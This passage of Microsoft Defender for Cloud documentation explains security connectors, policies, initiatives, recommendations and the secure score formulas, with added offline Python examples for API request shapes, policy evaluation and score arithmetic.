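As an added example (not Microsoft's code or the page's), the Python below builds the request targets for the operations in the reference above, a minimal Create Or Update body for an AWS connector with the CSPM offering, and a loop that follows the 'nextLink' paging property the List operations describe. The resource path and the body property names (environmentName, hierarchyIdentifier, environmentData, offerings, CspmMonitorAws, cloudRoleArn) are taken from the public Security Connectors API reference as I know it, not from this page, so confirm them against the current reference; the subscription id and the paged responses are constructed placeholders, and no request is actually sent.

```python
"""Security Connectors REST API request shapes and nextLink paging.

Added example, not Microsoft's code. Resource path and body property names
follow the public API reference as I know it (verify before use). The fetcher
is injected so the paging logic runs offline against constructed pages.
"""
import re
from typing import Callable, Dict, Iterator, List, Optional

ARM = "https://management.azure.com"
API_VERSION = "2021-12-01-preview"  # the version the reference above lists
PROVIDER = "providers/Microsoft.Security/securityConnectors"


def connector_url(subscription_id: str, resource_group: str, name: str) -> str:
    """Target for Create Or Update (PUT), Get (GET) and Delete (DELETE).
    PUT is idempotent: a second PUT for the same connector id updates it."""
    return (f"{ARM}/subscriptions/{subscription_id}/resourceGroups/{resource_group}"
            f"/{PROVIDER}/{name}?api-version={API_VERSION}")


def list_url(subscription_id: str, resource_group: Optional[str] = None) -> str:
    """List (subscription scope) or List By Resource Group."""
    scope = f"{ARM}/subscriptions/{subscription_id}"
    if resource_group:
        scope += f"/resourceGroups/{resource_group}"
    return f"{scope}/{PROVIDER}?api-version={API_VERSION}"


def aws_cspm_connector_body(location: str, aws_account_id: str, role_arn: str) -> dict:
    """Minimal PUT body for an AWS connector with the agentless CSPM offering.
    The role ARN is the one created by the CloudFormation template the
    article says to download from the portal. Both inputs are sanity-checked
    so a typo in the account id is caught before anything is sent."""
    if not re.fullmatch(r"\d{12}", aws_account_id):
        raise ValueError("AWS account id must be exactly 12 digits")
    if not role_arn.startswith(f"arn:aws:iam::{aws_account_id}:role/"):
        raise ValueError("role ARN must belong to the onboarded account")
    return {
        "location": location,
        "properties": {
            "environmentName": "AWS",
            "hierarchyIdentifier": aws_account_id,
            "environmentData": {"environmentType": "AwsAccount"},
            "offerings": [{
                "offeringType": "CspmMonitorAws",
                "nativeCloudConnection": {"cloudRoleArn": role_arn},
            }],
        },
    }


def iter_connectors(first_url: str, fetch: Callable[[str], dict]) -> Iterator[dict]:
    """Yield every connector from a List response, following 'nextLink' until
    the last page. A repeated URL is an error rather than an endless loop."""
    url: Optional[str] = first_url
    seen = set()
    while url:
        if url in seen:
            raise RuntimeError(f"nextLink cycle at {url}")
        seen.add(url)
        page = fetch(url)
        yield from page.get("value", [])
        url = page.get("nextLink")


def connector_names(first_url: str, fetch: Callable[[str], dict]) -> List[str]:
    return [c["name"] for c in iter_connectors(first_url, fetch)]


# Constructed two-page List response keyed by URL, standing in for ARM.
SUB = "00000000-0000-0000-0000-000000000000"  # placeholder subscription id
FIRST = list_url(SUB)
PAGES: Dict[str, dict] = {
    FIRST: {"value": [{"name": "aws-prod"}, {"name": "gcp-prod"}],
            "nextLink": FIRST + "&$skipToken=page2"},
    FIRST + "&$skipToken=page2": {"value": [{"name": "aws-dev"}]},
}

if __name__ == "__main__":
    print(connector_url(SUB, "rg-security", "aws-prod"))
    print(connector_names(FIRST, PAGES.__getitem__))
```

In a real run, `fetch` would be a function that sends an authenticated GET and returns the decoded JSON; keeping it injectable is what makes the paging logic testable without credentials.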


Next steps 


In this article, you've learned that as an alternative to creating connectors in the 
Defender for Cloud portal, you can create them programmatically by using the Defender 
for Cloud REST API. For more information, see other resources. 


What are security policies, initiatives, 
and recommendations? 
Microsoft Defender for Cloud applies security initiatives to your subscriptions. These
initiatives contain one or more security policies. Each of those policies results in a 
security recommendation for improving your security posture. This page explains each 
of these ideas in detail. 


What is a security policy? 


An Azure Policy definition, created in Azure Policy, is a rule about specific security
conditions that you want controlled. Built-in definitions include things like controlling
what type of resources can be deployed or enforcing the use of tags on all resources.
You can also create your own custom policy definitions.


To implement these policy definitions (whether built-in or custom), you'll need to assign 
them. You can assign any of these policies through the Azure portal, PowerShell, or 
Azure CLI. Policies can be disabled or enabled from Azure Policy. 


There are different types of policies in Azure Policy. Defender for Cloud mainly uses
'Audit' policies that check specific conditions and configurations and then report on
compliance. There are also 'Enforce' policies that can be used to apply secure settings.


What is a security initiative? 


A security initiative is a collection of Azure Policy definitions, or rules, that are grouped
together towards a specific goal or purpose. Security initiatives simplify management of
your policies by grouping a set of policies together, logically, as a single item.


A security initiative defines the desired configuration of your workloads and helps 
ensure you're complying with the security requirements of your company or regulators. 


Like security policies, Defender for Cloud initiatives are also created in Azure Policy. You 
can use Azure Policy to manage your policies, build initiatives, and assign initiatives to 
multiple subscriptions or for entire management groups. 


The default initiative automatically assigned to every subscription in Microsoft Defender
for Cloud is Microsoft cloud security benchmark. This benchmark is the Microsoft-authored
set of guidelines for security and compliance best practices based on common
compliance frameworks. This widely respected benchmark builds on the controls from
the Center for Internet Security (CIS) and the National Institute of Standards and
Technology (NIST) with a focus on cloud-centric security. Learn more about Microsoft
cloud security benchmark.


Defender for Cloud offers the following options for working with security initiatives and 
policies: 


• View and edit the built-in default initiative - When you enable Defender for
Cloud, the initiative named 'Microsoft cloud security benchmark' is automatically
assigned to all Defender for Cloud registered subscriptions. To customize this
initiative, you can enable or disable individual policies within it by editing a policy's
parameters. See the list of built-in security policies to understand the options
available out-of-the-box.

• Add your own custom initiatives - If you want to customize the security initiatives
applied to your subscription, you can do so within Defender for Cloud. You'll then
receive recommendations if your machines don't follow the policies you create. For
instructions on building and assigning custom policies, see Using custom security
initiatives and policies.

• Add regulatory compliance standards as initiatives - Defender for Cloud's
regulatory compliance dashboard shows the status of all the assessments within
your environment in the context of a particular standard or regulation (such as
Azure CIS, NIST SP 800-53 R4, SWIFT CSP CSCF-v2020). For more information, see
Improve your regulatory compliance.


What is a security recommendation? 


Using the policies, Defender for Cloud periodically analyzes the compliance status of
your resources to identify potential security misconfigurations and weaknesses. It then
provides you with recommendations on how to remediate those issues.
Recommendations are the result of assessing your resources against the relevant
policies and identifying resources that aren't meeting your defined requirements.


Defender for Cloud makes its security recommendations based on your chosen 
initiatives. When a policy from your initiative is compared against your resources and 
finds one or more that aren't compliant, it's presented as a recommendation in 
Defender for Cloud. 


Recommendations are actions for you to take to secure and harden your resources. Each 
recommendation provides you with the following information: 


• A short description of the issue
• The remediation steps to carry out in order to implement the recommendation
• The affected resources


In practice, it works like this:

1. Microsoft cloud security benchmark is an initiative that contains requirements.

For example, Azure Storage accounts must restrict network access to reduce their
attack surface.

2. The initiative includes multiple policies, each with a requirement of a specific
resource type. These policies enforce the requirements in the initiative.

To continue the example, the storage requirement is enforced with the policy
"Storage accounts should restrict network access using virtual network rules".

3. Microsoft Defender for Cloud continually assesses your connected subscriptions. If
it finds a resource that doesn't satisfy a policy, it displays a recommendation to fix
that situation and harden the security of resources that aren't meeting your
security requirements.

So, for example, if an Azure Storage account on any of your protected
subscriptions isn't protected with virtual network rules, you'll see the
recommendation to harden those resources.

So, (1) an initiative includes (2) policies that generate (3) environment-specific
recommendations.
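To make the three steps concrete, here is an added Python model (not Defender for Cloud's code): an initiative grouping two Azure Policy style audit rules, evaluated over constructed storage accounts and a VM, producing the recommendation with its unhealthy, healthy and not applicable resources. The first policy is the one named above; the second, "Secure transfer to storage accounts should be enabled", and its alias are written from the built-in rule as I know it, and the evaluator covers only the allOf/equals/notEquals subset of the policy language.

```python
"""Initiative -> policies -> recommendations, modelled in a few functions.

Added example, not Defender for Cloud's code. An initiative groups policy
definitions; each policy is an Azure Policy style rule scoped to one resource
type; evaluating it over resources yields a recommendation whose affected
resources fall into unhealthy, healthy and not applicable. The if/then, allOf,
field and equals/notEquals syntax is Azure Policy's; the evaluator and the
sample resources are constructed for this example.
"""
from typing import Any, Dict, List


def audit_policy(display_name: str, rtype: str, alias: str, compliant_value: Any) -> Dict[str, Any]:
    """Azure Policy style definition whose 'if' block is the NON-compliance condition.
    'audit' reports it (the effect Defender for Cloud mainly uses); 'deny' would block it."""
    return {"displayName": display_name,
            "policyRule": {"if": {"allOf": [{"field": "type", "equals": rtype},
                                            {"field": alias, "notEquals": compliant_value}]},
                           "then": {"effect": "audit"}}}


# The initiative: a grouping of policies toward one goal (its name is constructed).
STORAGE_INITIATIVE = {
    "displayName": "Storage hardening",
    "policyDefinitions": [
        # the policy named in the text above
        audit_policy("Storage accounts should restrict network access using virtual network rules",
                     "Microsoft.Storage/storageAccounts",
                     "Microsoft.Storage/storageAccounts/networkAcls.defaultAction", "Deny"),
        # the built-in "Secure transfer" rule as I know it; verify the alias in Azure Policy
        audit_policy("Secure transfer to storage accounts should be enabled",
                     "Microsoft.Storage/storageAccounts",
                     "Microsoft.Storage/storageAccounts/supportsHttpsTrafficOnly", True),
    ],
}


def field_value(resource: Dict[str, Any], name: str) -> Any:
    """'type'/'name'/'location' are top-level; a '<resourceType>/<dotted.path>'
    alias is read from the resource's properties (None if it is another type's alias)."""
    if name in ("type", "name", "location"):
        return resource.get(name)
    rtype = resource.get("type", "")
    if not name.startswith(rtype + "/"):
        return None
    node: Any = resource.get("properties", {})
    for part in name[len(rtype) + 1:].split("."):
        node = node.get(part) if isinstance(node, dict) else None
    return node


def matches(cond: Dict[str, Any], resource: Dict[str, Any]) -> bool:
    """Evaluate an 'if' tree (allOf, equals, notEquals) for one resource."""
    if "allOf" in cond:
        return all(matches(c, resource) for c in cond["allOf"])
    value = field_value(resource, cond["field"])
    if "equals" in cond:
        return value == cond["equals"]
    if "notEquals" in cond:
        return value != cond["notEquals"]
    raise ValueError(f"unsupported condition: {cond}")


def target_type(rule: Dict[str, Any]) -> str:
    """The resource type a rule is scoped to, from its {'field': 'type'} clause."""
    for c in rule["if"].get("allOf", [rule["if"]]):
        if c.get("field") == "type" and "equals" in c:
            return c["equals"]
    raise ValueError("rule has no resource type clause")


def recommendation(policy: Dict[str, Any], resources: List[Dict[str, Any]]) -> Dict[str, Any]:
    """Assess resources against one policy; the result is the recommendation with
    the same three tabs the details page shows."""
    rule = policy["policyRule"]
    rtype = target_type(rule)
    rec: Dict[str, Any] = {"recommendation": policy["displayName"], "effect": rule["then"]["effect"],
                           "unhealthy": [], "healthy": [], "notApplicable": []}
    for res in resources:
        if res.get("type") != rtype:
            rec["notApplicable"].append(res["name"])
        elif matches(rule["if"], res):
            rec["unhealthy"].append(res["name"])
        else:
            rec["healthy"].append(res["name"])
    return rec


def assess_initiative(initiative: Dict[str, Any], resources: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    return [recommendation(p, resources) for p in initiative["policyDefinitions"]]


# Constructed sample resources: one exposed account, two locked down, one VM.
SAMPLE_RESOURCES = [
    {"name": "sa-public", "type": "Microsoft.Storage/storageAccounts",
     "properties": {"networkAcls": {"defaultAction": "Allow"}, "supportsHttpsTrafficOnly": True}},
    {"name": "sa-locked", "type": "Microsoft.Storage/storageAccounts",
     "properties": {"networkAcls": {"defaultAction": "Deny"}, "supportsHttpsTrafficOnly": True}},
    {"name": "sa-legacy", "type": "Microsoft.Storage/storageAccounts",
     "properties": {"networkAcls": {"defaultAction": "Deny"}, "supportsHttpsTrafficOnly": False}},
    {"name": "vm-web", "type": "Microsoft.Compute/virtualMachines", "properties": {}},
]

if __name__ == "__main__":
    for rec in assess_initiative(STORAGE_INITIATIVE, SAMPLE_RESOURCES):
        print(rec)
```

The VM lands in the not applicable tab for both policies because its type never matches the rule's type clause, which is the same reason a storage-account alias can never be read off a VM.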


Security recommendation details


Security recommendations contain details that help you understand its significance and 
how to handle it. 


[Screenshot: details page for the recommendation "Machines should have vulnerability findings resolved": toolbar with Exempt, Disable rule, View policy definition and Open query; Severity, Freshness interval (4 hours), Exempted resources (3, with a "View all exemptions" link) and Tactics and techniques (Initial Access +5); Description; Related recommendations (1): "Machines should have a vulnerability assessment solution", dependency type Prerequisite, 136 of 163 affected resources; Remediation steps; Affected resources tabs: Unhealthy (22), Healthy (1), Not applicable (164), listing VMs in the ASC DEMO subscription.]


The recommendation details shown are: 


1. For supported recommendations, the top toolbar shows any or all of the following
buttons:

  • Enforce and Deny (see Prevent misconfigurations with Enforce/Deny
  recommendations).

  • View policy definition to go directly to the Azure Policy entry for the
  underlying policy.

  • Open query - You can view the detailed information about the affected
  resources using Azure Resource Graph Explorer.


2. Severity indicator

3. Freshness interval

4. Count of exempted resources - if exemptions exist for a recommendation, this
shows the number of resources that have been exempted with a link to view the
specific resources.

5. Mapping to MITRE ATT&CK® tactics and techniques - if a recommendation has
defined tactics and techniques, select the icon for links to the relevant pages on
MITRE's site. This applies only to Azure scored recommendations.
[Screenshot: details page for the recommendation "Management ports should be closed on your virtual machines": toolbar with Exempt, View policy definition and Open query; Severity, Freshness interval (24 hours) and Tactics and techniques (Initial Access, with the technique External Remote Services (T1133) linked to MITRE's site); Description beginning "Open remote management ports ..."; Remediation steps; Affected resources.]


6. Description - A short description of the security issue.

7. When relevant, the details page also includes a table of related recommendations.
The relationship types are:

  • Prerequisite - A recommendation that must be completed before the
  selected recommendation

  • Alternative - A different recommendation, which provides another way of
  achieving the goals of the selected recommendation

  • Dependent - A recommendation for which the selected recommendation is a
  prerequisite

For each related recommendation, the number of unhealthy resources is shown in
the "Affected resources" column.


Tip

If a related recommendation is grayed out, its dependency isn't yet completed
and so isn't available.


8. Remediation steps - A description of the manual steps required to remediate the
security issue on the affected resources. For recommendations with the Fix option,
you can select View remediation logic before applying the suggested fix to your
resources.


9. Affected resources - Your resources are grouped into tabs:

  • Healthy resources — Relevant resources, which either aren't impacted or on
  which you've already remediated the issue.

  • Unhealthy resources — Resources that are still impacted by the identified
  issue.

  • Not applicable resources — Resources for which the recommendation can't
  give a definitive answer. The not applicable tab also includes reasons for each
  resource.


[Screenshot: the recommendation "Vulnerabilities in your virtual machines should be remediated" (description: "Monitors for vulnerabilities on your virtual machines as discovered by a vulnerability assessment solution."), Not applicable resources tab selected (2 unhealthy, 1 healthy, 22 not applicable), with a Reason column showing, for three Contoso VMs: "The extension might be corrupted, please try to remove it and deploy again", "Findings have not been received yet for the VM", and "Vulnerability assessment scanner is not deployed on the VM".]


10. Action buttons to remediate the recommendation or trigger a logic app. 


Viewing the relationship between a 
recommendation and a policy 


As mentioned above, Defender for Cloud's built-in recommendations are based on the
Microsoft cloud security benchmark. Almost every recommendation has an underlying
policy that is derived from a requirement in the benchmark.


When you're reviewing the details of a recommendation, it's often helpful to be able to 
see the underlying policy. For every recommendation supported by a policy, use the 
View policy definition link from the recommendation details page to go directly to the 
Azure Policy entry for the relevant policy: 


[Screenshot: the recommendation "Management ports should be closed on your virtual machines" (severity Medium, freshness interval 24 hours), with the Exempt and View policy definition buttons in the toolbar, the Description, Remediation steps and Affected resources sections (25 unhealthy, 121 healthy, 42 not applicable), a list of Contoso VMs and the Trigger logic app and Exempt actions.]


Use this link to view the policy definition and review the evaluation logic. 


If you're reviewing the list of recommendations on our Security recommendations
reference guide, you'll also see links to the policy definition pages:


Management ports should be closed on your virtual machines

Open remote management ports are exposing your VM to a high level of risk from Internet-based
attacks. These attacks attempt to brute force credentials to gain admin access to the machine.

(Related policy: Management ports should be closed on your virtual machines)


Next steps 


This page explained, at a high level, the basic concepts and relationships between
policies, initiatives, and recommendations. For related information, see:


• Create custom initiatives
• Disable security recommendations
• Learn how to edit a security policy in Azure Policy


Secure score 
Overview of secure score
Microsoft Defender for Cloud has two main goals: 


• to help you understand your current security situation
• to help you efficiently and effectively improve your security


The central feature in Defender for Cloud that enables you to achieve those goals is the
secure score.


All Defender for Cloud customers automatically gain access to the secure score when 
they enable Defender for Cloud. Microsoft Cloud Security Benchmark (MCSB), formerly 
known as Azure Security Benchmark, is automatically applied to your environments and 
will generate all the built-in recommendations that are part of this default initiative. 


Defender for Cloud continually assesses your cross-cloud resources for security issues. It 
then aggregates all the findings into a single score so that you can tell, at a glance, your 
current security situation: the higher the score, the lower the identified risk level. 


• In the Azure portal pages, the secure score is shown as a percentage value and the
underlying values are also clearly presented:

[Screenshot: the Security posture tile, showing an overall secure score of 43% with the per-environment scores (Azure 55%, AWS 31%, GCP 24%), the counts of unassigned and overdue recommendations, and an "Explore your security posture" link.]


• In the Azure mobile app, the secure score is shown as a percentage value and you
can tap the secure score to see the details that explain the score:

[Screenshot: the Azure mobile app view of the Contoso Infra subscription, with the overall secure score of 54% (~26 out of 48 points) broken down into Fixed (54%, 26 points) and Unhealthy (46%, 22 points).]
To increase your security, review Defender for Cloud's recommendations page and 
remediate the recommendation by implementing the remediation instructions for each 
issue. Recommendations are grouped into security controls. Each control is a logical 
group of related security recommendations, and reflects your vulnerable attack surfaces. 
Your score only improves when you remediate all of the recommendations for a single 
resource within a control. To see how well your organization is securing each individual 
attack surface, review the scores for each security control. 


For more information, see How your secure score is calculated below. 


Manage your security posture 


On the Security posture page, you're able to see the secure score for your entire 
subscription, and each environment in your subscription. By default all environments are 
shown. 


[Screenshot: the Defender for Cloud Security posture page, with the "Secure score over time", "Governance report" and "Guides & Feedback" commands, an environment selector (Azure, AWS, GCP) with per-environment scores, and the totals for subscriptions, accounts, projects, unhealthy resources, recommendations, attack paths and overdue recommendations.]


Page section | Description
Environment selector (Azure, AWS, GCP) | Select your environment to see its secure score, and details. Multiple environments can be selected at once. The page will change based on your selection here.
Totals (subscriptions, accounts, projects, unhealthy resources, recommendations, attack paths) | Shows the total number of subscriptions, accounts and projects that affect your overall score. It also shows how many unhealthy resources and how many recommendations exist in your environments.


The bottom half of the page allows you to view and manage the individual
secure scores, number of unhealthy resources and even view the recommendations for
all of your individual subscriptions, accounts, and projects.


You can group this section by environment by selecting the Group by Environment
checkbox.


[Screenshot: the Environment section, with a search box, an Environment filter and a "Group by environment" checkbox above a paged table of Name, Secure score, Unhealthy resources and Recommendations for each Azure subscription, AWS account and GCP project (for example, the ASC DEMO Azure subscription at 72% with 89 of 252 unhealthy resources and a "View recommendations" link).]


How your secure score is calculated 


The contribution of each security control towards the overall secure score is shown on 
the recommendations page. 


[Screenshot: the Defender for Cloud Recommendations page, with the secure score (43%), active recommendations, counts of unhealthy, healthy and not applicable resources, the filter bar (Recommendation status, Severity, Resource type, Recommendation maturity, Owner, Environment) and the list of security controls with their potential score increase; controls such as "Protect applications against DDoS attacks" are marked "Not scored".]


To get all the possible points for a security control, all of your resources must comply 
with all of the security recommendations within the security control. For example, 
Defender for Cloud has multiple recommendations regarding how to secure your 
management ports. You'll need to remediate them all to make a difference to your 
secure score. 


Example scores for a control 


[Screenshot: a security control row in the recommendations list, with the columns Name, Max score, Current score, Potential score increase and Insights.]


In this example: 


• Remediate vulnerabilities security control - This control groups multiple
recommendations related to discovering and resolving known vulnerabilities.

• Max score - The maximum number of points you can gain by completing all
recommendations within a control. The maximum score for a control indicates the
relative significance of that control and is fixed for every environment. Use the max
score values to triage the issues to work on first.

For a list of all controls and their max scores, see Security controls and their
recommendations.

• Current score - The current score for this control.

Current score = [Score per resource] * [Number of healthy resources]

Each control contributes towards the total score. In this example, the control is
contributing 2.00 points to the current total secure score.

• Potential score increase - The remaining points available to you within the control.
If you remediate all the recommendations in this control, your score will increase
by 9%.

Potential score increase = [Score per resource] * [Number of unhealthy resources]

• Insights - Gives you extra details for each recommendation, such as:


  o Preview recommendation - This recommendation won't affect your secure
  score until it's GA.

  o Fix - From within the recommendation details page, you can use 'Fix' to
  resolve this issue.

  o Enforce - From within the recommendation details page, you can
  automatically deploy a policy to fix this issue whenever someone creates a
  non-compliant resource.

  o Deny - From within the recommendation details page, you can prevent new
  resources from being created with this issue.


Calculations - understanding your score


Metric: Security control's current score

Formula and example:

Secure score for a single security control = [Max score / (Healthy resources + Unhealthy resources)] * [Healthy resources]

Each individual security control contributes towards the secure score. Each
resource affected by a recommendation within the control contributes towards
the control's current score. The current score for each control is a measure of the
status of the resources within the control.

Example control, as shown on the recommendations page: Remediate vulnerabilities (6 points)
  Max score: 6
  Healthy: 4 resources
  Unhealthy: 74 resources
  Current score: 0.31
  Potential increase: 5.69

In this example, the max score of 6 would be divided by 78 because that's the
sum of the healthy and unhealthy resources.

6 / 78 = 0.0769

Multiplying that by the number of healthy resources (4) results in the current
score:

0.0769 * 4 = 0.31


Metric: Secure score for a single subscription, or connector

Formula and example:

Secure score for a subscription = ([Sum of current scores for all controls] / [Sum of maximum scores for all controls]) * 100


[Screenshot: the environment list showing the ASC DEMO Azure subscription with a secure score of 34% and 9 of 31 unhealthy resources.]


In this example, there's a single subscription, or connector with all security 
controls available (a potential maximum score of 60 points). The score shows 28 
points out of a possible 60 and the remaining 32 points are reflected in the 
“Potential score increase" figures of the security controls. 


This equation is the same equation for a connector with just the word
subscription being replaced by the word connector.

The controls in this example and their potential score increase, as shown on the
recommendations page:

Control                               | Potential score increase
Remediate vulnerabilities             | + 9% (6 points)
Secure management ports               | + 9% (5 points)
Enable encryption at rest             | + 6% (3 points)
Restrict unauthorized network access  | + 4% (2 points)
Enable DDoS protection on Vnet        | + 3% (2 points)
Apply system updates                  | + 3% (2 points)
Manage access and permissions         | + 3% (2 points)
Remediate security configurations     | + 3% (2 points)
Apply data classification             | + 2% (1 point)
Encrypt data in transit               | + 2% (1 point)
Adaptive application control          | + 1% (1 point)
Enable auditing and logging           | + 1% (1 point)
Enable endpoint protection            | + 1% (1 point)
Enable MFA (Completed)                | + 0% (0 points)
Additional best practices             | + 0% (0 points)


Metric: Secure score for multiple subscriptions, and connectors

Formula and example:

Secure score for multiple subscriptions = ([Sum of (subscription score * subscription weight) for all subscriptions] / [Sum of weights for all subscriptions]) * 100
and 
connectors The combined score for multiple subscriptions and connectors includes a weight 


for each subscription, and connector. The relative weights for your subscriptions, 
and connectors are determined by Defender for Cloud based on factors such as 
the number of resources. 

The current score for each subscription, and connector is calculated in the same
way as for a single subscription, or connector, but then the weight is applied as
shown in the equation.

When you view multiple subscriptions and connectors, the secure score evaluates 
all resources within all enabled policies and groups their combined impact on 
each security control's maximum score. 


[Screenshot: the "All environments" secure score view: 14 environments in total 
(1 subscription, 7 accounts, 6 projects), 359 of 683 resources unhealthy, 92 
recommendations; per-environment secure score Azure 72%, AWS 30%, GCP 37%.] 


The combined score isn't an average; rather, it's the evaluated posture of the 
status of all resources across all subscriptions and connectors. 

Here too, if you go to the recommendations page and add up the potential 
points available, you'll find that it's the difference between the current score (22) 
and the maximum score available (58). 
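The two formulas above (a single subscription's score, and the weighted combination across subscriptions and connectors), carried through in code as an added example; this is not code from the Defender for Cloud documentation or product. The control names and resource counts are constructed to reproduce the page's single-subscription figures (28 of a possible 60 points); the subscription weights are made-up numbers standing in for the weights Defender for Cloud assigns, and leaving controls with no applicable resources out of both sums is this example's assumption.

```python
"""Model of the secure score arithmetic (added example, not product code).

Control names and resource counts are constructed to reproduce the page's
single-subscription example (28 of a possible 60 points).
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Control:
    """One security control: its maximum points and the resources it covers."""
    name: str
    max_score: int   # points the control is worth when every resource is healthy
    healthy: int     # resources with all of the control's recommendations healthy
    unhealthy: int   # resources with at least one unhealthy recommendation

    @property
    def resources(self) -> int:
        return self.healthy + self.unhealthy

    def current_score(self) -> float:
        # current = (max score / number of resources) * healthy resources;
        # multiplying first keeps the integer cases exact.
        return self.max_score * self.healthy / self.resources

    def potential_increase(self) -> float:
        # points gained if every unhealthy resource in this control were fixed
        return self.max_score - self.current_score()


def subscription_score(controls: list[Control]) -> tuple[float, int, float]:
    """(current points, maximum points, percentage) for one subscription or
    connector. Assumption: controls with no applicable resources contribute to
    neither sum, which is why the maximum depends on the environment."""
    applicable = [c for c in controls if c.resources > 0]
    current = sum(c.current_score() for c in applicable)
    maximum = sum(c.max_score for c in applicable)
    return current, maximum, current / maximum * 100


def potential_increases(controls: list[Control]) -> list[tuple[str, float, float]]:
    """Per-control 'Potential score increase' as (name, percent, points),
    largest gain first, like the portal's security controls list."""
    _, maximum, _ = subscription_score(controls)
    rows = [(c.name, c.potential_increase() / maximum * 100, c.potential_increase())
            for c in controls if c.resources > 0]
    return sorted(rows, key=lambda r: r[2], reverse=True)


def combined_score(subscriptions: dict[str, tuple[float, float]]) -> float:
    """sum(score_i * weight_i) / sum(weight_i) * 100, where score_i is the
    fraction current/max for subscription or connector i and weight_i is the
    weight Defender for Cloud assigns (constructed numbers here)."""
    total_weight = sum(w for _, w in subscriptions.values())
    return sum(s * w for s, w in subscriptions.values()) / total_weight * 100


# Constructed data: 15 controls worth 60 points in total, 28 currently earned.
DEMO_CONTROLS = [
    Control("Enable MFA", 10, healthy=3, unhealthy=0),
    Control("Secure management ports", 8, healthy=0, unhealthy=8),
    Control("Apply system updates", 6, healthy=4, unhealthy=2),
    Control("Remediate vulnerabilities", 6, healthy=0, unhealthy=5),
    Control("Manage access and permissions", 4, healthy=1, unhealthy=1),
    Control("Remediate security configurations", 4, healthy=3, unhealthy=3),
    Control("Enable encryption at rest", 4, healthy=1, unhealthy=3),
    Control("Encrypt data in transit", 4, healthy=3, unhealthy=1),
    Control("Restrict unauthorized network access", 4, healthy=2, unhealthy=2),
    Control("Adaptive application control", 3, healthy=2, unhealthy=1),
    Control("Enable DDoS protection on Vnet", 2, healthy=0, unhealthy=1),
    Control("Apply data classification", 2, healthy=1, unhealthy=1),
    Control("Enable endpoint protection", 2, healthy=1, unhealthy=1),
    Control("Enable auditing and logging", 1, healthy=0, unhealthy=2),
    Control("Additional best practices", 0, healthy=0, unhealthy=4),
]


if __name__ == "__main__":
    current, maximum, pct = subscription_score(DEMO_CONTROLS)
    print(f"single subscription: {current:.0f} of {maximum} points ({pct:.0f}%)")
    for name, pct_gain, points in potential_increases(DEMO_CONTROLS):
        print(f"  +{pct_gain:.0f}% ({points:.0f} points)  {name}")
    # A smaller but healthier connector (constructed weight 5 vs 31): the
    # combined figure is weighted, not the plain average of 47% and 90%.
    demo = {"ASC DEMO": (current / maximum, 31.0), "aws-connector": (0.9, 5.0)}
    print(f"combined: {combined_score(demo):.1f}% "
          f"(plain average would be {(pct + 90) / 2:.1f}%)")
```

Run as a script, it prints the per-control list in the same shape as the portal's "Potential score increase" column, with the increases summing to the 32 missing points, and then shows that the combined score for two environments lands close to the larger one's score rather than halfway between them.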


Which recommendations are included in the secure score 
calculations? 


Only built-in recommendations that are part of the default initiative, Azure Security 
Benchmark, have an impact on the secure score. Recommendations flagged as Preview 
aren't included in the calculations of your secure score. They should still be remediated 
wherever possible, so that when the preview period ends they'll contribute towards your 
score. 


Preview recommendations are marked with a Preview icon next to their name. 


Improve your secure score 


To improve your secure score, remediate security recommendations from your 
recommendations list. You can remediate each recommendation manually for each 
resource, or use the Fix option (when available) to resolve an issue on multiple resources 
quickly. For more information, see Remediate recommendations. 


You can also configure the Enforce and Deny options on the relevant recommendations 
to improve your score and make sure your users don't create resources that negatively 
impact your score. 


Security controls and their recommendations 


The table below lists the security controls in Microsoft Defender for Cloud. For each 
control, you can see the maximum number of points you can add to your secure score if 
you remediate all of the recommendations listed in the control, for all of your resources. 


The set of security recommendations provided with Defender for Cloud is tailored to the 
available resources in each organization's environment. You can disable 
recommendations and exempt specific resources from a recommendation to further 
customize the recommendations. 


We recommend every organization carefully reviews their assigned Azure Policy 
initiatives. 


Tip 

For details about reviewing and editing your initiatives, see manage security 
policies. 


Even though Defender for Cloud's default security initiative, the Azure Security 
Benchmark, is based on industry best practices and standards, there are scenarios in 
which the built-in recommendations listed below might not completely fit your 
organization. It's sometimes necessary to adjust the default initiative - without 
compromising security - to ensure it's aligned with your organization's own policies, 
industry standards, regulatory standards, and benchmarks. 


Secure score: 10 

Security control and description: Enable MFA - Defender for Cloud places a high value 
on multi-factor authentication (MFA). Use these recommendations to secure the users of 
your subscriptions. There are three ways to enable MFA and be compliant with the 
recommendations: security defaults, per-user assignment, conditional access policy. 
Learn more about these options in Manage MFA enforcement on your subscriptions. 

Recommendations: 

- Accounts with owner permissions on Azure resources should be MFA enabled 
- Accounts with write permissions on Azure resources should be MFA enabled 
- MFA should be enabled on accounts with owner permissions on subscriptions 
- MFA should be enabled on accounts with write permissions on subscriptions 


Secure score: 8 

Security control and description: Secure management ports - Brute force attacks often 
target management ports. Use these recommendations to reduce your exposure with 
tools like just-in-time VM access and network security groups. 

Recommendations: 

- Internet-facing virtual machines should be protected with network security groups 
- Management ports of virtual machines should be protected with just-in-time network access control 
- Management ports should be closed on your virtual machines 


Secure score: 6 

Security control and description: Apply system updates - Not applying updates leaves 
unpatched vulnerabilities and results in environments that are susceptible to attacks. 
Use these recommendations to maintain operational efficiency, reduce security 
vulnerabilities, and provide a more stable environment for your end users. To deploy 
system updates, you can use the Update Management solution to manage patches and 
updates for your machines. 

Recommendations: 

- Log Analytics agent should be installed on Linux-based Azure Arc-enabled machines 
- Log Analytics agent should be installed on virtual machine scale sets 
- Log Analytics agent should be installed on virtual machines 
- Log Analytics agent should be installed on Windows-based Azure Arc-enabled machines 
- System updates on virtual machine scale sets should be installed 
- System updates should be installed on your machines 
- System updates should be installed on your machines (powered by Update Center) 


Secure score: 6 

Security control and description: Remediate vulnerabilities - Defender for Cloud 
includes multiple vulnerability assessment scanners to check your machines, databases, 
and container registries for weaknesses that threat actors might leverage. Use these 
recommendations to enable these scanners and review their findings. Learn more about 
scanning machines, SQL servers, and container registries. 

Recommendations: 

- Azure Arc-enabled Kubernetes clusters should have the Azure Policy extension installed 
- Azure Kubernetes Service clusters should have the Azure Policy add-on for Kubernetes installed 
- Code repositories should have code scanning findings resolved 
- Code repositories should have Dependabot scanning findings resolved 
- Code repositories should have infrastructure as code scanning findings resolved 
- Code repositories should have secret scanning findings resolved 
- Container images should be deployed from trusted registries only 
- Container registry images should have vulnerability findings resolved 
- Function apps should have vulnerability findings resolved 
- Kubernetes clusters should gate deployment of vulnerable images 
- Machines should have a vulnerability assessment solution 
- Machines should have vulnerability findings resolved 
